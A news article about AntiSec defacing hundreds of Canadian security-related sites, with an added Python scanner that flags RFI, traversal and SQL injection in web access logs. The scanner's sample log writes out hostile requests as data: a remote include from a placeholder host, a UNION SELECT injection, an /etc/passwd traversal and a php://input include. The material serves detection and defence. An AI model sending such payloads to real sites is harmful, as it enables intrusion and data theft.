AntiSec Remains Active – Defaces Hundreds of Canadian Websites

On Wednesday, the AntiSec movement defaced hundreds of websites in what was said to be proof that the movement works just fine without Sabu, their alleged leader who was arrested and flipped by the FBI last year.

The defaced sites had something in common: they were security-related, and all were hosted either by Shaw Cable directly or by its subsidiary Mountain Cablevision, both of which are in Canada.

“Our Vessel sailed through their servers collecting all information they owned. These companies earn money exploiting the fear of the people and their feeling of daily life state sponsored insecurity,” an AntiSec statement explained.

“We are doing this not only to cause embarrassment and disruption to the security community but to show we are still alive and well… Law enforcement collaborators, and military contractors, private security companies beware: we’re coming for your mail spools, barely legal porn, your sister’s pix and confidential documents.”

The attack targeted three different servers. One was a dedicated hosting account, while the other two were shared hosting servers. AntiSec named the security-related websites, such as datasci.net, trojan-sis.com, e.password.com, and securitytrainingsupport.com, but hundreds of other domains on the same servers were caught in the crossfire.

At the time this story was written, the majority of the attacked domains were either completely offline or reporting database connection errors. A full list of the domains present on the attacked servers can be seen here.

In the shared hosting environments, the most likely avenue of attack was Remote File Inclusion (RFI). An RFI flaw would have let AntiSec supporters upload a malicious shell script and gain full access to the targeted website. Depending on the permissions configured on the server itself, access to every other domain hosted on it could then be gained from that point.

Another possible entry point, judging by versions of the targeted websites as they appeared before the attack, is SQL Injection (SQLi). In the past, this method has allowed AntiSec supporters to wreak havoc on a domain and walk off with confidential and sensitive information. SQLi also enables mass attacks within a shared environment, because the databases for many sites are often stored locally on the same server.
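The two entry points described above, RFI and SQLi, leave characteristic traces in web server access logs, and the article's own advice further down is to audit the web applications that collect day-to-day operational data. The following is an added example, not code from SecurityWeek, AntiSec, or either hosting provider: a small scanner that parses constructed Apache/Nginx "combined" format log lines and flags request parameters whose decoded value looks like a remote include (a URL or PHP stream wrapper), a directory traversal (the local-inclusion cousin of RFI, which goes slightly beyond what the article names), or a SQL injection fragment. All IP addresses, hostnames, paths and timestamps in the sample log are placeholders made up for this demonstration.

```python
"""Flag RFI, traversal and SQLi indicators in web server access logs.

Constructed example for illustration; not code from the article or any
hosting provider. The log lines below are invented (RFC 5737 test addresses).
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache/Nginx "combined" log format: client, identd, user, [timestamp],
# "METHOD target protocol", status, size, referer, user-agent.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})'
)

# Include-style parameter pointing at a URL or PHP stream wrapper instead of
# a local page name: the signature of a remote file inclusion attempt.
RFI_VALUE = re.compile(r'^\s*(?:https?|ftps?|file|php|data):', re.IGNORECASE)
# ".." path components in a parameter value: local inclusion / traversal.
TRAVERSAL_VALUE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')
# Common SQL injection fragments, matched after URL-decoding the value.
SQLI_VALUE = re.compile(
    r"\bunion\b\s+(?:all\s+)?select\b"      # UNION-based data extraction
    r"|\bor\b\s+[\w']+\s*=\s*[\w']+"        # tautology such as OR 1=1
    r"|'\s*(?:--|#|/\*)"                    # quote followed by a comment
    r"|\b(?:sleep|benchmark)\s*\(",         # time-based probing
    re.IGNORECASE,
)

# Constructed sample traffic: two clean requests, one RFI attempt, one SQLi
# attempt, one traversal attempt and one PHP stream-wrapper include.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Mar/2012:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.11 - - [15/Mar/2012:10:01:05 +0000] "GET /index.php?page=http://203.0.113.5/c.txt HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.0.2.12 - - [15/Mar/2012:10:01:09 +0000] "GET /news.php?id=42 HTTP/1.1" 200 9911 "-" "Mozilla/5.0"
192.0.2.13 - - [15/Mar/2012:10:01:12 +0000] "GET /news.php?id=42%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 500 311 "-" "curl/7.21"
192.0.2.14 - - [15/Mar/2012:10:01:20 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 403 200 "-" "Mozilla/5.0"
192.0.2.15 - - [15/Mar/2012:10:01:25 +0000] "GET /index.php?page=php://input HTTP/1.1" 200 700 "-" "Mozilla/5.0"
"""


def classify_value(value: str):
    """Return 'rfi', 'traversal', 'sqli' or None for one decoded parameter value."""
    # parse_qsl already decoded once; decoding again catches double-encoding.
    decoded = unquote_plus(value)
    if RFI_VALUE.search(decoded):
        return "rfi"
    if TRAVERSAL_VALUE.search(decoded):
        return "traversal"
    if SQLI_VALUE.search(decoded):
        return "sqli"
    return None


def scan_log(text: str):
    """Parse each log line and return a finding for every suspicious parameter."""
    findings = []
    for line in text.splitlines():
        match = LOG_LINE.match(line)
        if not match:
            continue  # not in combined format; skip rather than guess
        parts = urlsplit(match["target"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            category = classify_value(value)
            if category:
                findings.append({
                    "ip": match["ip"],
                    "path": parts.path,
                    "param": name,
                    "value": unquote_plus(value),
                    "category": category,
                    "status": int(match["status"]),
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['category']:9} {f['ip']:<12} {f['path']}?{f['param']}="
              f"{f['value']!r} -> HTTP {f['status']}")
```

Pattern matching of this kind is a triage feed, not proof of compromise: the requests worth chasing first are the flagged ones that returned HTTP 200, since a remote include that succeeded is exactly the foothold the article describes, whereas a 403 or 500 suggests the attempt was blocked or broke. On a shared host, the same scan should be run across every virtual host's log, because the article's point is that one vulnerable site can expose its neighbours.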

SecurityWeek reached out and asked about the methods used during the attacks, given that the defacement message mentioned backdoors into the servers, but was turned away. The only comment for the record was “Also Cocks.” (For the unfamiliar, this term can be used several ways. One is lulz, or amusement. The other is a quick way to tell someone to go away. AntiSec doesn’t always like to give away their methods, and when they do, it’s often within the defacement message itself.)

Earlier this month, after the FBI announced the arrest of Sabu and the fact that they had turned him in order to collect evidence against other LulzSec members and Anonymous supporters, one Special Agent close to the case said that the arrest had cut the head off the movement.

That same day, AntiSec targeted Panda Security, defacing a webserver that hosted several sub-domains used by the company. According to AntiSec’s claims, Panda has helped put 25 people behind bars for their involvement in various operations championed by Anonymous, in addition to lurking on Anonymous’s public IRC space in an attempt to identify various chat participants.

Panda’s Technical Director, Luis Corrons, commented, “Even though we have not helped LE to bring to jail any LulzSec member, I would have loved to be involved in that.” Panda recovered the webserver within hours, and no critical information was lost. The point AntiSec is making should be clear: just because people have been arrested, the threat that supporters of the movement pose has not gone away. Those who celebrated and assumed the threat had passed are in for a rude awakening should they let their guard down.

As always, organizations should check their critical web applications and protect the assets that are most valuable, which is often the information collected for day-to-day operations. Proper coding practices and security auditing, system and software patches for the webservers, applying the principle of least privilege, and disabling non-essential services are just some of the steps that will stop basic attacks from working.

Just remember, if an attacker is targeting your organization directly, there’s little you can do to stop them as they’re likely to get in eventually, which is why incident response is just as important as risk management.
